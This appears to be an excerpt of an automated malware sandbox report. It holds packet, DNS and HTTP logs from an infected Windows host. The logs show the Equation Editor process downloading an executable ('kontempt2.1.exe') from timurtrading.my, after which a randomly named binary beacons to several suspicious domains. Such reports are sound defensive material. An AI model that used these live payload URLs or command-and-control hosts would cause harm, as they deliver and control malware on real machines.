                                                                          Oct 22, 2024 15:01:40.037187099 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.037870884 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.037887096 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.037903070 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.037916899 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.037916899 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.037919044 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.037930012 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.037942886 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.038729906 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.038746119 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.038759947 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.038774967 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.038774967 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.038786888 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.038805008 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.038814068 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.039577961 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.039594889 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.039611101 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.039623022 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.039623976 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.039628983 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.039635897 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.039645910 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.039664984 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.039674044 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.040381908 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.040399075 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.040412903 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.040429115 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.040565968 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.041230917 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.041246891 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.041261911 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.041275978 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.041276932 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.041280031 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.041295052 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.041300058 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.041310072 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.041320086 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042049885 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042079926 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042093039 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042095900 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042112112 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042115927 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042125940 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042139053 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042934895 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042951107 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042964935 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042980909 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042980909 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.042980909 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042992115 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.042999029 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.043019056 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.043030024 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.043771982 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.043788910 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.043803930 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.043812037 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.043819904 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.043823957 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.043833017 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.043853998 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044404030 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044420004 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044435024 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044445038 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044450998 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044456005 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044464111 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044469118 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044486046 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.044487000 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044502020 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.044512033 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.045231104 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.045247078 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.045274019 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.045275927 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.045275927 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.045290947 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.045306921 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.045310020 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.045322895 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.045334101 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.058532000 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:50.062067032 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:50.067867041 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:50.067928076 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:50.077229977 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:50.082643032 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:50.082779884 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:50.082988024 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:50.088151932 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:51.069818020 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:51.272566080 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:51.444725037 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:51.444747925 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:51.444895983 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:51.445035934 CEST8049165185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:51.445099115 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:51.445099115 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:51.585867882 CEST4916580192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:52.601419926 CEST4916680192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:52.606964111 CEST8049166185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:52.607062101 CEST4916680192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:52.618303061 CEST4916680192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:52.624183893 CEST8049166185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:53.641880035 CEST8049166185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:53.771110058 CEST8049166185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:53.771219015 CEST4916680192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:54.131452084 CEST4916680192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:55.144905090 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:55.152682066 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:55.152896881 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:55.163276911 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:55.168706894 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:55.168839931 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:55.168843985 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:55.174330950 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:55.174352884 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:56.213905096 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:56.342912912 CEST8049167185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:56.342962980 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:56.670073986 CEST4916780192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:57.687377930 CEST4916880192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:57.692931890 CEST8049168185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:57.693007946 CEST4916880192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:57.699842930 CEST4916880192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:57.705286980 CEST8049168185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:58.771230936 CEST8049168185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:58.891320944 CEST8049168185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:01:58.891412973 CEST4916880192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:58.892416000 CEST4916880192.168.2.22185.196.10.234
                                                                          Oct 22, 2024 15:01:58.897774935 CEST8049168185.196.10.234192.168.2.22
                                                                          Oct 22, 2024 15:02:03.908025980 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.914115906 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.914222956 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.923171043 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.929449081 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.929465055 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.929507971 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:04.186081886 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:04.557157993 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:04.557257891 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:05.437454939 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:05.443146944 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:06.454708099 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.460326910 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:06.460412979 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.471586943 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.477127075 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:07.093274117 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:07.093344927 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:07.980299950 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:07.985760927 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:08.998111010 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.003830910 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.003921986 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.019007921 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.024457932 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.024539948 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.024575949 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.029854059 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.030034065 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.633546114 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.633718014 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:10.522953033 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:10.528345108 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:11.540288925 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.545936108 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:11.546027899 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.558645964 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.564243078 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.179976940 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.180834055 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.181061983 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:12.183023930 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:12.188352108 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:17.218152046 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.223527908 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.223633051 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.239753962 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.245239019 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.245250940 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.245318890 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.250643969 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:18.744219065 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:18.770209074 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:18.770349026 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.760921001 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.766562939 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:19.766629934 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.776103020 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.781461954 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:20.407773018 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:20.407910109 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.287113905 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.598858118 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.687621117 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:21.687637091 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:21.687786102 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.310520887 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.316428900 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.316488981 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.326925993 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.332289934 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.332348108 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.332532883 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.337651014 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.337770939 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:23.829933882 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:23.835721970 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:23.836422920 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.852859020 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.858555079 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:24.859339952 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.866843939 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.872502089 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.498353958 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.499103069 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.499209881 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:25.515455008 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:25.520900965 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:27.870326996 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:02:27.876749992 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:02:27.876823902 CEST4916480192.168.2.2245.33.6.223

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 22, 2024 15:00:45.794792891 CEST5456253192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:00:45.803292990 CEST53545628.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:01:33.658576965 CEST5291753192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:01:33.670391083 CEST53529178.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:01:38.660665989 CEST6275153192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:01:38.814579964 CEST53627518.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:01:38.815045118 CEST6275153192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:01:38.822830915 CEST53627518.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:01:49.766463995 CEST5789353192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:01:50.059843063 CEST53578938.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:02:03.897742987 CEST5482153192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:02:03.905828953 CEST53548218.8.8.8192.168.2.22
                                                                          Oct 22, 2024 15:02:17.199229956 CEST5471953192.168.2.228.8.8.8
                                                                          Oct 22, 2024 15:02:17.211153030 CEST53547198.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 22, 2024 15:00:45.794792891 CEST192.168.2.228.8.8.80x8091Standard query (0)timurtrading.myA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:33.658576965 CEST192.168.2.228.8.8.80xfbf2Standard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:38.660665989 CEST192.168.2.228.8.8.80x659cStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:38.815045118 CEST192.168.2.228.8.8.80x659cStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:49.766463995 CEST192.168.2.228.8.8.80x735eStandard query (0)www.75e296qdx.topA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:03.897742987 CEST192.168.2.228.8.8.80x1a06Standard query (0)www.myprefpal.xyzA (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:17.199229956 CEST192.168.2.228.8.8.80x6565Standard query (0)www.jilifish.winA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 22, 2024 15:00:45.803292990 CEST8.8.8.8192.168.2.220x8091No error (0)timurtrading.my192.3.255.145A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:33.670391083 CEST8.8.8.8192.168.2.220xfbf2No error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:38.814579964 CEST8.8.8.8192.168.2.220x659cNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:38.822830915 CEST8.8.8.8192.168.2.220x659cNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:01:50.059843063 CEST8.8.8.8192.168.2.220x735eNo error (0)www.75e296qdx.top185.196.10.234A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:03.905828953 CEST8.8.8.8192.168.2.220x1a06No error (0)www.myprefpal.xyzmyprefpal.xyzCNAME (Canonical name)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:03.905828953 CEST8.8.8.8192.168.2.220x1a06No error (0)myprefpal.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:03.905828953 CEST8.8.8.8192.168.2.220x1a06No error (0)myprefpal.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:17.211153030 CEST8.8.8.8192.168.2.220x6565No error (0)www.jilifish.winjilifish.winCNAME (Canonical name)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:17.211153030 CEST8.8.8.8192.168.2.220x6565No error (0)jilifish.win15.197.148.33A (IP address)IN (0x0001)false
                                                                          Oct 22, 2024 15:02:17.211153030 CEST8.8.8.8192.168.2.220x6565No error (0)jilifish.win3.33.130.190A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • timurtrading.my
                                                                          • www.omnibizlux.biz
                                                                          • www.sqlite.org
                                                                          • www.75e296qdx.top
                                                                          • www.myprefpal.xyz
                                                                          • www.jilifish.win

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.2249161192.3.255.145803448C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:00:45.822179079 CEST317OUTGET /kontempt2.1.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: timurtrading.my
                                                                          Connection: Keep-Alive
                                                                          Oct 22, 2024 15:00:46.517280102 CEST369INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Tue, 22 Oct 2024 13:00:46 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: keep-alive
                                                                          Location: https://timurtrading.my/kontempt2.1.exe
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.2249163167.172.133.32801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:01:33.686908007 CEST420OUTGET /8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.omnibizlux.biz
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:01:34.725764990 CEST303INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Tue, 22 Oct 2024 13:01:34 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 153
                                                                          Connection: close
